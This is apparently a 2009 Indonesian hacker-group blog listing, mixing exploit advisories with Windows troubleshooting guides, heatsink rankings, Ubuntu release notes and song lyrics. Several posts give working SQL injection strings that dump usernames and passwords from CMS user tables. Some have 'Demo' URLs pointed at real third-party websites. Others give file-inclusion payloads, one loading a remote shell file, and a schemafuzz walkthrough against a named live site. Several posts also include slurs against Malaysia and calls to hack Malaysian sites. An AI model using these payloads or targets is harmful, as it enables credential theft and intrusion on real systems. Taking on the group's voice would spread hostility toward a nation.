SQLi Melalui schemafuzz

Bengang bengong di kosan daripada bete gg ada kerjaan gw iseng-iseng aja nyari target dengan menggunakan sqli.. kemudian dari pada repot dengan menggunakan sql injeksion saya pake schemafuzz aja biar simple gg bertele" hehehee

sebelum kita menggunakan schemafuzz pada windows terlebih utama kita menginstall perl serta python untuk memanggil schemafuzz,dll... krna scehmafuzz menggunakan python ....

bagi yg belum punya bisa di download di  sini

setlah kita install maka cari target !!

target yg saya gunakan kali ini adalah www.kasumbo.com/products.php?id=8

kemudian kita bangkitkan schemafuzz kita.... setelah bangkit sang schemafuzz kita dari kuburnya kita langsung ketikan

schemafuzz.py --findcol -u www.kasumbo.com/products.php?id=8

setelah itu dengan secara otomatis akan mencari dmna bug dari situs si target...

Read more »

METALLICA ngeFans juga loch sama bang Hj.Rhoma ... ^_^

Read more »

Bloggers Si Dhudulzz

BloGgerS Si dhudulzz

Read more »

Chief Content Management System

##############################################################
## Chief Content Management System - news.php?id= ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 14, 2009 ##
##############################################################
/~~\__/~~\_/~~~~\_/~~\_______/~~\__________________/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\_________________/~~\_/~~\_
/~~~~~\_____/~~\__/~~\_______/~~\_______/~~~~~~~\__/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\____________________/~~\___
/~~\__/~~\_/~~~~\_/~~~~~~~~\_/~~~~~~~~\_____________/~~\____
____________________________________________________________
-=- KILL-9 CREW -=- INDONESIANCODER -=-

##############################################################


[ Software Information ]

[+] Vendor : http://www.chiefcms.com/
[+] Software : Chief Content Management System
[+] Vulnerability : SQL injection
[+] Dork : "Powered by The Chief"

##############################################################

[ Vulnerable File ]

http://127.0.0.1/news.php?id=[KILL-9 Crew SQLi]

[ Exploit ]

-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--

[ Demo ]

http://www.chiefcms.com/news.php?id=-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--

##############################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] Don Tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_aneh
[+] Contrex,onthel,yasea,bugs,olivia,Jovan1,Aar,Ardy
[+] Coracore,black666girl,chitoz,NepT,ichal,tengik and YOU!!

[ NOTE ]

This is My birthday i am 18 !!


[ QUOTE ]

"Ini dadaku, mana dadamu?

Kalau Malaysia mau konfrontasi ekonomi, Mari kita hadapi dengan konfrontasi ekonomi
Kalau Malaysia mau konfrontasi politik, Mari kita hadapi dengan konfrontasi politik
Kalau Malaysia mau konfrontasi militer, Mari kita hadapi dengan konfrontasi militer

Soekarno, 1963”

Soekarno : Dengan ini saya menyatakan "GANYANG MALAYSIA"

FUCK MALAYSIA !!!



# www.indonesiancoder.com

Read more »

Posted in: Bugs

Clicknet CMS v2.1 Remote File Inclusion

################################################################
## Clicknet CMS v2.1 Remote File Inclusion ##
## Author : Don Tukulesto (root[at]indonesiancoder[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, Semptember 14, 2009 ##
################################################################

[ Software Information ]

[+] Clicknet CMS v2.1(index.php) Remote File Inclusion
[+] Vendor : http://cms.clicknet.dk
[+} Download : http://cms.clicknet.dk/download/index.php?test=2
[+] Dork : “Powered by Clicknet CMS”

################################################################


[ ExPL0!T ]

http://127.0.0.1/index.php?_SERVER[DOCUMENT_ROOT]=[WWW.INDONESIANCODER.COM]

[ D3M0]

http://www.kimage.dk/fotografisk/?_SERVER[DOCUMENT_ROOT]=

################################################################

[ Greetings ]

[+] Indonesian Coder, SurabayaHackerLink, ServerIsDown, Mainhack Brotherhood
[+] M3NW5, BH4ND55, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, Senot, Joker, oghy, Den Awink
Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d, TUCKER, Ian Petrucii, Chercut, B4YU5154, Baim
[+] bejat Bejat, Plaque, Tuex, rey_cute, BenyCooL, D3miT_EvoLUtiOn, XNITRO, DraCoola.com
[+] Jack-, Yadoy666 + MIYA666, kecemplungkalen, xshadow, exnome, H4ck3rKu, kaMtiEz, Arianom,
[+] V3N0M, tiw0l, Pathloader and YOU !!!

[ QUOTE ]

“Ini dadaku, mana dadamu?

Kalau Malaysia mau konfrontasi ekonomi, Mari kita hadapi dengan konfrontasi ekonomi
Kalau Malaysia mau konfrontasi politik, Mari kita hadapi dengan konfrontasi politik
Kalau Malaysia mau konfrontasi militer, Mari kita hadapi dengan konfrontasi militer

Soekarno, 1963”

fvck MALAYSIA !!!


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: Bugs

Mambo Component com_hestar Remote SQL Injection Vulnerability

## com_hestar 1.0.0 ##
## Author : M3NW5 (M3NW5[at]hackermail[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, Semptember 07,2009 ##


[ Software Information ]

[+] Software : com_hestar
[+] Version : 1.0.0
[+] Provider : Netvistun - netvistun@netvistun.is
[+] Web Provider : www.netvistun.is
[+] Vulnerability : SQL injection
[+] Google Dork : inurl:"com_hestar"

#####################################################
[ POC ]

http://127.0.0.1/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--


[ Demo ]

http://www.arbae.is/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--
#####################################################

[ Greetings ]

[+] All of Indonesian Coder Member, Don Tukulesto, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, TUCKER, Petrucii, Chercut,
Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO, DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom

[ SHOUT ]

STILL FVCKED TO MALAYSIA, TRULLY THIEF COUNTRY IN ASIA.
Let's Hack Malaysian site. PROUD TO BE INDONESIAN !!!!!

[ Special to ]

Anggie Lestari Putri sulung dari keluarga bapak dodi dan ibu dini ^^ i lope yu pull...

# milw0rm.com [2009-09-09]

Read more »

Posted in: Bugs,Hacking

Task Manager User Name column is empty (username at task manager)

When you open Task Manager, the User Name field might be blank, as shows in the Fig. This happens if the Terminal Service is not started. The default startup type for this service need to be set to Automatic and it must be started. Follow this procedure:

* Click Start, Run and type Services.msc
* Locate Terminal Services and double-click it
* Set the Startup type to Automatic, and click Apply
* Click the Start button to launch the service manually.
* Now Task Manager User Name field will show up.



# www.indonesiancoder.com

Read more »

Posted in: Tutorial

TOP #5 HEATSINK BY LOW-NOISE* (for AMD CPUs) (* at maksimum speed)

#1 Scythe Orochi

#2 Scythe Zipang

#3 Glacialtech Igloo 5750 Silent

#4 Verax Helado

#5 Glacialtech Igloo 7311 Silent

*Heatsinks are ranked according to the lowest decibel reading measured, while the fan is at its maximum speed. More detailed results reside in each specific heatsink review.

"Which One Is Yours ?"

Source: www.frostytech.com/top5heatsinks.cfm

# www.indonesiancoder.com

Read more »

Posted in: News

TOP #5 HEATSINK BY TEMPERATURE (for AMD CPUs)

#1 Thermalright Ultra 120

#2 Spire Thermax II

#3 Sunbeam Core Contact Freezer

#4 Coolermaster V8

#5 Xigmatek Dark Knight S1283

*Heatsinks are ranked according to the lowest rise in ambient temperature on Frostytech thermal test platform, with fan at maximum speed. More detailed results reside in each specific heatsink review.

"Which One Is Yours ?"

Source: www.frostytech.com/top5heatsinks.cfm




VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: News

TOP #5 HEATSINK BY LOW-NOISE* (for Intel LGA775 CPUs) (* at maksimum speed)

#1 Scythe Orochi

#2 Scythe Zipang

#3 Glacialtech Igloo 5750 Silent

#4 Intel Stock Core 2 Duo

#5 Scythe Mine Rev. B

*Heatsinks are ranked according to the lowest decibel reading measured, while the fan is at its maximum speed. More detailed results reside in each specific heatsink review.


"Which One Is Yours ?"

Source: www.frostytech.com/top5heatsinks.cfm




VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: News

TOP #5 HEATSINK BY TEMPERATURE (for Intel LGA775 CPUs)

#1 Titan TTC-NK85TZ

#2 Sunbeam Core Contact Freezer

#3 Spire Thermax II

#4 Xigmatek Dark Knight S1283

#5 Thermolab BARAM

*Heatsinks are ranked according to the lowest rise in ambient temperature on Frostytech thermal test platform, with fan at maximum speed. More detailed results reside in each specific heatsink review.


"Which One Is Yours ?"

Source: www.frostytech.com/top5heatsinks.cfm




VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Read more »

Posted in: News

How to edit the Boot.ini file in Windows XP

Save a Backup Copy of Boot.ini

1. Right-click My Computer, and then click Properties.
-or-
Click Start, click Run, type sysdm.cpl, and then click OK.
2. On the Advanced tab, click Settings under Startup and Recovery.
3. Under System Startup, click Edit. This opens the file in Notepad ready for editing.
4. In Notepad, click File on the Menu bar, and then click Save As.
5. Right click in an empty area of the Save As dialog box, point to New in the context menu, and then click Folder.
6. Type a name for the new folder, for example temp, and then press the ENTER key to create the folder named temp.
7. Double-click the new folder named temp, and then click the Save button to save a backup copy of the Boot.ini file.

Edit the Boot.ini File
To view and edit the Boot.ini file:

1. Right-click My Computer, and then click Properties.
-or-
Click Start, click Run, type sysdm.cpl, and then click OK.
2. On the Advanced tab, click Settings under Startup and Recovery.
3. Under System Startup, click Edit.

Sample Boot.ini File
This is a sample of a default Boot.ini file from a Windows XP Professional computer.

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect

This is a sample of the above Boot.ini file with a previous installation of Windows 2000 on a separate partition.

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows XP Professional" /fastdetect
multi(0)disk(0)rdisk(0)partition(2)\WINNT="Windows 2000 Professional" /fastdetect

Modifying the Boot.ini
While you can modify the Boot.ini file using the Startup and Recovery dialog, where you can select the default operating system, change the timeout value, or manually edit the file, the following method uses the command line utility, Bootcfg.exe.

Note The Bootcfg.exe utility is only available in Windows XP Professional. This utility is not available in Microsoft Windows XP Home Edition. Therefore, this section does not apply to Windows XP Home Edition.

1. Click Start, and then click Run.
2. In the Open text box, type cmd.
3. At the command prompt, type bootcfg /?.
4. The help and parameters for BOOTCFG.exe will display.

Adding an Operating System
At the command prompt, type:
bootcfg /copy /d Operating System Description /ID#
Where Operating System Description is a text description (e.g. Windows XP Home Edition), and where # specifies the boot entry ID in the operating systems section of the BOOT.INI file from which the copy has to be made.


Removing an Operating System
At the command prompt, type:
bootcfg /delete /ID#
Where # specifies the boot entry ID that you want to be deleted from the operating systems section of the BOOT.INI file (e.g. 2 for the second Operating system that is listed.


Setting the Default Operating System
At the command prompt, type:
bootcfg /default /ID#
Where # specifies the boot entry id in the operating systems section of the BOOT.INI file to be made the default operating system.


Setting the Time Out
At the command prompt, type: bootcfg /timeout# Where # specifies the time in seconds after which default operating system will be loaded.


Open the Boot.ini File to Verify Changes

1. Right-click My Computer, and then click Properties.
-or-
Click Start, click Run, type sysdm.cpl, and then click OK.
2. On the Advanced tab, click Settings under Startup and Recovery.
3. Under System Startup, click Edit.


# www.indonesiancoder.com

Read more »

Posted in: Tutorial

NTLDR is Missing

Issue:

NTLDR is Missing.

Related errors:

Below are the full error messages that may be seen when the computer is booting.

NTLDR is Missing
Press any key to restart

Boot: Couldn't find NTLDR
Please insert another disk

NTLDR is missing
Press Ctrl Alt Del to Restart

Cause:

1. Computer is booting from a non-bootable source.
2. Computer hard disk drive is not properly setup in BIOS.
3. Corrupt NTLDR and/or NTDETECT.COM file.
4. Misconfiguration with the boot.ini file.
5. Attempting to upgrade from a Windows 95, 98, or ME computer that is using FAT32.
6. New hard disk drive being added.
7. Corrupt boot sector / master boot record.
8. Seriously corrupted version of Windows 2000 or Windows XP.
9. Loose or Faulty IDE/EIDE hard disk drive cable.

Solutions:

Computer is booting from a non-bootable source

Many times this error is caused when the computer is attempting to boot from a non-bootable floppy disk or CD-ROM. First verify that no floppy diskette is in the computer, unless you are attempting to boot from a diskette.

If you are attempting to boot from a floppy diskette and are receiving this error message it is likely that the diskette does not have all the necessary files and/or is corrupt.

If you are attempting to install Windows XP or Windows 2000 and are receiving this error message as the computer is booting verify that your computer BIOS has the proper boot settings. For example, if you are attempting to run the install from the CD-ROM make sure the CD-ROM is the first boot device, and not the hard disk drive.

Second, when the computer is booting you should receive the below prompt.

Press any key to boot from the CD

Important: When you see this message press any key such as the Enter key immediately, otherwise it will try booting from the hard drive and likely get the NTLDR error again.

Note: If you are not receiving the above message and your BIOS boot options are set properly it's also possible that your CD-ROM drive may not be booting from the CD-ROM properly. Verify the jumpers are set properly on the CD-ROM drive. Additional information about checking the CD-ROM drive connections can be found on document CH000213.

Additional information: This error has also been known to occur when a memory stick is in a card reader and the computer is attempting to boot from it. If you have any type of card reader or flash reader make sure that no memory stick is inside the computer.

Computer hard disk drive is not properly setup in BIOS

Verify that your computer hard disk drive is properly setup in the BIOS / CMOS setup. Improper settings can cause this error. Additional information on how to enter the BIOS / CMOS setup can be found in document CH000192.

Corrupt NTLDR and/or NTDETECT.COM file

Windows 2000 users
Windows XP users

Windows 2000 users

If your computer is using Microsoft Windows 2000 and you are encountering the NTLDR error. Create the below boot.ini file on the floppy diskette drive.

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Professional" /fastdetect

Copy the NTLDR and NTDETECT.COM files from another computer using the same operating system. Both of these files are located in the root directory of the primary hard disk drive. For example, C:\NTLDR and C:\NTDETECT.COM should be the locations of these files on many computers.

*

Please keep in mind that these files are hidden system files, if you need additional help with viewing hidden files in Windows please see document CH000516.

Once these files have been copied to a floppy diskette reboot the computer and copy the NTLDR and NTDETECT.COM files to the root directory of the primary hard disk drive. Below is an example of what commonly should be performed from the A:\> drive.

copy ntldr c:
copy ntdetect.com c:

After the above two files have been copied, remove the floppy diskette and reboot the computer.

Windows XP users

1. Insert the Windows XP bootable CD into the computer.
2. When prompted to press any key to boot from the CD, press any key.
3. Once in the Windows XP setup menu press the "R" key to repair Windows.
4. Log into your Windows installation by pressing the "1" key and pressing enter.
5. You will then be prompted for your administrator password, enter that password.
6. Copy the below two files to the root directory of the primary hard disk. In the below example we are copying these files from the CD-ROM drive letter, which in this case is "e." This letter may be different on your computer.

copy e:\i386\ntldr c:\
copy e:\i386\ntdetect.com c:\

7. Once both of these files have been successfully copied, remove the CD from the computer and reboot.

Misconfiguration with the boot.ini file

Edit the boot.ini on the root directory of the hard disk drive and verify that it is pointing to the correct location of your Windows operating system and that the partitions are properly defined. Additional information about the boot.ini can be found on document CH000492.

Attempting to upgrade from a Windows 95, 98, or ME computer that is using FAT32

If you are getting this error message while you are attempting to upgrade to Windows 2000 or Windows XP from Windows 95, Windows 98, or Windows ME running FAT32 please try the below recommendations.

1. Boot the computer with a Windows 95, Windows 98 or Windows ME bootable diskette.
2. At the A:\> prompt type:

sys c:

3. After pressing enter you should receive the "System Transferred" message. Once this has been completed remove the floppy diskette and reboot the computer.

New hard disk drive being added

If you are attempting to add a new hard disk drive to the computer make sure that drive is a blank drive. Adding a new hard disk drive to a computer that already has Windows installed on it may cause the NTLDR error to occur.

If you are unsure if the new drive is blank or not try booting from a bootable diskette and format the new hard disk drive.

Corrupt boot sector / master boot record

It's possible your computer's hard disk drive may have a corrupt boot sector and/or master boot record. These can be repaired through the Microsoft Windows Recovery console by running the fixboot and fixmbr commands.

Additional information and help in getting into the Microsoft Windows Recovery console can be found on document CH000627.

Seriously corrupted version of Windows 2000 or Windows XP

If you have tried each of the above recommendations that apply to your situation and you continue to experience this issue it is possible you may have a seriously corrupted version of Microsoft Windows. Therefore we would recommend you reinstall Microsoft Windows 2000 and Windows XP.

If you are encountering this issue during your setup you may wish to completely erase your computer hard disk drive and all of its existing data and then install Microsoft Windows 2000 / Windows XP. Additional information about erasing the computer and starting over can be found on document CH000186.


Loose or Faulty IDE/EIDE hard disk drive cable

This issue has been known to be caused by a loose or fault IDE/EIDE cable. If the above recommendation does not resolve your issue and your computer hard disk drive is using an IDE or EIDE interface. Verify the computer hard disk drive cable is firmly connected by disconnected and reconnecting the cable.

If the issue continues it is also a possibility that the computer has a faulty cable, try replacing the hard disk drive cable with another cable and/or a new cable.


# www.indonesiancoder.com

Read more »

Posted in: Tutorial

Ubuntu Linux v9.04 (Jaunty Jackalope) - Final

Release date: April 23, 2009

Ubuntu is a complete Linux-based operating system, freely available with both community and professional support. It is developed by a large community and we invite you to participate too!

The Ubuntu community is built on the ideas enshrined in the Ubuntu Philosophy: that software should be available free of charge, that software tools should be usable by people in their local language and despite any disabilities, and that people should have the freedom to customise and alter their software in whatever way they see fit.

These freedoms make Ubuntu fundamentally different from traditional proprietary software: not only are the tools you need available free of charge, you have the right to modify your software until it works the way you want it to.

Ubuntu is suitable for both desktop and server use. The current Ubuntu release supports PC (Intel x86) and 64-bit PC (AMD64) architectures.

Ubuntu includes more than 16,000 pieces of software, but the core desktop installation fits on a single CD. Ubuntu covers every standard desktop application from word processing and spreadsheet applications to web server software and programming tools.



Ubuntu on the desktop

Ubuntu offers you a complete Linux-based operating system, including all the major applications you need to play and work. With a strong focus on a desktop that Just Works, Ubuntu is a great choice for home or the office. The base system and all included software is free, and support is available from the community or by professional support providers.

Desktop simplicity

When you start the system for the first time you are greeted by a desktop that is unusually clean and tidy. No desktop icons by default! Even the recycling bin has been moved down to the taskbar. The default theme is designed to be easy on the eye. But Linux is inherently flexible; you can customise the look and behaviour of the desktop in a range of ways, from simply changing the default theme to selecting a different desktop environment altogether.

Ubuntu on the server

Built on the solid foundation of Debian — known for its robust server installations — the Ubuntu Server Edition has a strong heritage for reliable performance and predictable evolution. The first Ubuntu release with a separate server edition was 5.10, in October 2005.

With the latest release, 9.04, the Ubuntu Server Edition adds support for several common configurations, bringing the ease of use that Ubuntu has become famous for on the desktop to server deployments. The new Ubuntu Server Edition provides a well-integrated platform for deploying a new server with any of the standard internet services: mail, web, DNS, file serving or database management.

A key lesson from the Debian heritage is that of security by default. The Ubuntu Server has no open ports after the installation and contains only the essential software needed to build a secure server.

Automatic LAMP (Linux, Apache, MySQL and PHP)

In about 15 minutes, the time it takes to install Ubuntu Server Edition, you can have a LAMP server up and ready to go. This feature, exclusive to Ubuntu Server Edition, is available at the time of installation.

The LAMP option saves the trouble of installing and integrating each of the four separate LAMP components, a process which can take hours and requires someone who is skilled in the installation and configuration of the individual applications. You get increased security, reduced time to install, and reduced risk of misconfiguration, all of which results in a lower cost of ownership.

Supported architectures

Ubuntu 9.04 Server Edition supports the following architectures:



* Supports x86
* Supports AMD64



Homepage and more info here:

http://www.ubuntu.com/

Download Ubuntu Linux v9.04 - Desktop Edition - Multi platforms:

http://releases.ubuntu.com/9.04/ubuntu-9.04-desktop-i386.iso
http://releases.ubuntu.com/9.04/ubuntu-9.04-desktop-amd64.iso

or

http://nl2.releases.ubuntu.com/9.04/ubuntu-9.04-desktop-i386.iso
http://nl2.releases.ubuntu.com/9.04/ubuntu-9.04-desktop-amd64.iso

Download Ubuntu Linux v9.04 - Server Edition - Multi platforms:

http://releases.ubuntu.com/9.04/ubuntu-9.04-server-i386.iso
http://releases.ubuntu.com/9.04/ubuntu-9.04-server-amd64.iso

or

http://nl2.releases.ubuntu.com/9.04/ubuntu-9.04-server-i386.iso
http://nl2.releases.ubuntu.com/9.04/ubuntu-9.04-server-amd64.iso

Download Ubuntu Linux v9.04 - Alternate Edition - Multi platforms:

http://releases.ubuntu.com/9.04/ubuntu-9.04-alternate-i386.iso
http://releases.ubuntu.com/9.04/ubuntu-9.04-alternate-amd64.iso

or

http://nl2.releases.ubuntu.com/9.04/ubuntu-9.04-alternate-i386.iso
http://nl2.releases.ubuntu.com/9.04/ubuntu-9.04-alternate-amd64.iso

Download Ubuntu Linux v9.04 - UNR USB image - Intel x86 platform:

http://releases.ubuntu.com/9.04/ubuntu-9.04-netbook-remix-i386.img

or

http://nl2.releases.ubuntu.com/9.04/ubuntu-9.04-netbook-remix-i386.img

Other download mirrors here:

http://www.ubuntu.com/download

Read more »

Posted in: News

Kubuntu Linux v9.04 (Jaunty Jackalope) - Final

Release date: April 23, 2009

Kubuntu is a user friendly operating system based on KDE, the K Desktop Environment. With a predictable 6 month release cycle and part of the Ubuntu project, Kubuntu is the GNU/Linux distribution for everyone.

Supported architectures

Kubuntu 9.04 Edition supports the following architectures:



* Supports x86
* Supports AMD64



Homepage and more info here:

http://www.kubuntu.com/

Download Kubuntu Linux v9.04 - Desktop Edition - Multi platforms:

http://releases.ubuntu.com/kubuntu/9.04/kubuntu-9.04-desktop-i386.iso
http://releases.ubuntu.com/kubuntu/9.04/kubuntu-9.04-desktop-amd64.iso

or

http://nl2.releases.ubuntu.com/kubuntu/9.04/kubuntu-9.04-desktop-i386.iso
http://nl2.releases.ubuntu.com/kubuntu/9.04/kubuntu-9.04-desktop-amd64.iso

Download Kubuntu Linux v9.04 - Alternate Edition - Multi platforms:

http://releases.ubuntu.com/kubuntu/9.04/kubuntu-9.04-alternate-i386.iso
http://releases.ubuntu.com/kubuntu/9.04/kubuntu-9.04-alternate-amd64.iso

or

http://nl2.releases.ubuntu.com/kubuntu/9.04/kubuntu-9.04-alternate-i386.iso
http://nl2.releases.ubuntu.com/kubuntu/9.04/kubuntu-9.04-alternate-amd64.iso

Other download mirrors here:

http://www.kubuntu.com/download

Read more »

Posted in: News

Gobuntu Linux v9.04 (Jaunty Jackalope) - Final

Release date: April 23, 2009

Gobuntu is a GNU/Linux operating system, derived from Ubuntu, that endeavors to adhere to the Free Software Foundation's four freedoms and intends to provide a base for other free software platforms to build upon with minimal modification required. It does this by only including open-source non-restricted software. This means there will be no firmware, drivers, applications, or content included in Gobuntu that does not include the full source or whose license does not provide the right to use, study, modify, and redistribute the body of work.

Gobuntu shares the same system requirements as Ubuntu. At present, this means Gobuntu is available for 32-bit and 64-Bit PC architectures and the install requires at least 4 GB of disk space.

Why would I want Gobuntu?

If you are looking to build a free software distribution based off of Ubuntu, or you wish to use an operating system that only provides you with truly free software and content, you should consider trying Gobuntu.

Please note that because running Gobuntu on most laptops and many desktops will be difficult, Gobuntu is intended for experienced Linux enthusiasts at this time.

Gobuntu is a text-based install CD. At present there is no live CD installer for Gobuntu.

Supported architectures

Gobuntu 9.04 supports the following architectures:



* Supports x86
* Supports AMD64



Homepage and more info here:

http://www.ubuntu.com/products/whatisubuntu/gobuntu

Download Gobuntu Linux v9.04 - Multi platforms:

http://cdimage.ubuntu.com/gobuntu/releases/9.04/release/gobuntu-9.04-alternate-i386.iso
http://cdimage.ubuntu.com/gobuntu/releases/9.04/release/gobuntu-9.04-alternate-amd64.iso

Read more »

Posted in: News

Mythbuntu Linux v9.04 (Jaunty Jackalope) - Final

Release date: April 23, 2009

Mythbuntu is an community supported add-on for Ubuntu focused upon setting up a standalone MythTV based PVR system. It can be used to prepare a standalone system or for integration with an existing MythTV network. Unlike similar projects, Mythbuntu keeps close ties with Ubuntu and all development is given back to Ubuntu. This architecture allows simple conversions from a standard desktop to a Mythbuntu machine and vice versa. The development cycle of Mythbuntu closely follows that of Ubuntu, releasing every six months with Ubuntu releases.

Desktop

Mythbuntu uses the XFCE4 desktop. All unnecessary standard Ubuntu applications such as OpenOffice, Evolution, and a full Gnome desktop are not installed for a Mythbuntu. If at any time a user wants to, they can install ubuntu-desktop, kubuntu-desktop, or xubuntu-desktop and add a full desktop onto their installation. This is done via the Mythbuntu Control Centre.

Mythbuntu-Control-Centre

The Mythbuntu Control Centre is a custom GUI used to configure the system. From here you can select what kind of system (Backend, Frontend, Both) you want. You can also install different desktops such as ubuntu-desktop and kubuntu-desktop. Install Plugins, configure MySQL, set passwords, install proprietary drivers, proprietary codecs, setup remote controls, and a range of other features all from one convenient program.

Live Frontend

A Mythbuntu CD can also be used as a live frontend. This is great if you want to turn a laptop or desktop into a quick frontend or quickly test hardware compatibility. The live frontend provides a GUI to mount network shares, configure a remote, hostname, location of your master backend and a place to save settings. All settings can be saved directly back to a flash drive for easy portability.

Self Replication

Mythbuntu 9.04 and later have support for creating and hosting diskless frontend images for a network. This takes the stress out of maintaining a variety of systems, and instead puts it all into a single centralized server.

Supported architectures

Mythbuntu 9.04 Edition supports the following architectures:



* Supports x86
* Supports AMD64



Homepage and more info here:

http://www.mythbuntu.org/

Download Mythbuntu Linux v9.04 - Desktop Edition - Multi platforms:

http://cdimage.ubuntu.com/mythbuntu/releases/9.04/release/mythbuntu-9.04-desktop-i386.iso
http://cdimage.ubuntu.com/mythbuntu/releases/9.04/release/mythbuntu-9.04-desktop-amd64.iso

or

ftp://ftp.osuosl.org/pub/mythbuntu/mythbuntu-9.04-desktop-i386.iso
ftp://ftp.osuosl.org/pub/mythbuntu/mythbuntu-9.04-desktop-amd64.iso

Download Mythbuntu Linux v9.04 - Alternate Edition - Multi platforms:

http://cdimage.ubuntu.com/mythbuntu/releases/9.04/release/mythbuntu-9.04-alternate-i386.iso
http://cdimage.ubuntu.com/mythbuntu/releases/9.04/release/mythbuntu-9.04-alternate-amd64.iso

or

ftp://ftp.osuosl.org/pub/mythbuntu/mythbuntu-9.04-alternate-i386.iso
ftp://ftp.osuosl.org/pub/mythbuntu/mythbuntu-9.04-alternate-amd64.iso

Other download mirrors here:

http://www.mythbuntu.org/downloads

Read more »

Posted in: News

Xubuntu Linux v9.04 (Jaunty Jackalope) - Final

Release date: April 23, 2009

Xubuntu is a complete GNU/Linux based operating system with an Ubuntu base. It is lighter and tends to be more efficient than Ubuntu with GNOME or KDE, since it uses the Xfce Desktop environment, which makes it ideal for old or low-end machines, thin-client networks, or for those who would like to get more performance out of their hardware.

Supported architectures

Xubuntu 9.04 Edition supports the following architectures:



* Supports x86
* Supports AMD64



Homepage and more info here:

http://www.xubuntu.com/

Download Xubuntu Linux v9.04 - Desktop Edition - Multi platforms:

http://cdimage.ubuntu.com/xubuntu/releases/9.04/release/xubuntu-9.04-desktop-i386.iso
http://cdimage.ubuntu.com/xubuntu/releases/9.04/release/xubuntu-9.04-desktop-amd64.iso

Download Xubuntu Linux v9.04 - Alternate Edition - Multi platforms:

http://cdimage.ubuntu.com/xubuntu/releases/9.04/release/xubuntu-9.04-alternate-i386.iso
http://cdimage.ubuntu.com/xubuntu/releases/9.04/release/xubuntu-9.04-alternate-amd64.iso

Other download mirrors here:

http://cdimage.ubuntu.com/xubuntu/releases/

Read more »

Posted in: News

Superman Is Dead - All Angels Cry

Can you tell me why, the world is so ugly
And there ain't no pretty pictures everywhere I go
Spend some of your time, and think of the answer
Why must people get so scared most of their life
Now tell me why
Why the angels gonna cry
To see the way we live our lives, where this, the heart goes?
And tell me why
Why the angels gonna cry
I close my eyes and a better place will it come true

Walking down the street, in one bloody cold night
Where everyone is blind, they show you how to feed your hate
Education now, war for tomorrow
And I do believe we're living on a time bomb!

Read more »

Posted in: Lyrics

Superman Is Dead - Falling Down

My friend just called me up to join his party
I found myself dressing up fine, just like the king

My lady stepped beside me. Sexy, damn! She burned the place
She whispered "I will never loose this night , ever"
Tequila's blasting out my mind. Everything's about going wild.
When I looked at you, my lady! You! My friend took you! I got drunk
Then nothing I can do.

Falling down
Fall fall falling down. Tease my head out loud
Falling down
Fall falling down. Keep my face against the wall
Falling down
Fall fall falling down. Push the light against the clouds.
The night's going dark, totally dark. I'm all outta stars

Waiting for your lovely kiss that night
No one knew, I was lost in the park
And then I found someone to make me laugh
His eyes so bright, blew me away
He cares more than you

When I returned, I could not leave his burning heart alone
I though you knew what it was that I had to do
Deep in my heart, he's got a million ways to go
And sure, I like.. The great new house, the brand new cars
Your friend is mine. And so what? nothing I can do
****

Those who punish me are guilty babe
It's so great! Being a lady
Should I send you your make up bag?
Just to make you comfortable

I'm a normal girl, I am not the same
But I love his air con room
There's nothing wrong with me...again, nothing I can do
I've got someone new, I keep walking thru

I wanna know how far is hell from you?

Hey!, I am not the winner of this race!
You have to be warmer than him actually. Could you say "good luck" for my new destination ?.
You said you would be proud if I've done what's right for me.
...oh no no no no no....bullshit!

Read more »

Posted in: Lyrics

WebPortal CMS 0.8b Multiple Remote/Local File Inclusion Vulnerabilities

script:webportal-0.8-beta
-------------------------------------------------
Author: ahmadbady
email: kivi_hacker666@yahoo.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-====-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=--
download from:https://sites.google.com/site/ivanoculmine/Home/webportal-0.8-beta.zip?attredirects=0

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=--=-=--===-=--=-=-=
xpl:

http://127.0.0.1/path/webportal-0.8-beta/libraries/helpdocs/help.php?lang=[local file]

http://127.0.0.1/path/webportal-0.8-beta/indexk.php?lib_path=http://site.com/shell.txt?

http://127.0.0.1/path/webportal-0.8-beta/index.php?error=[local file]
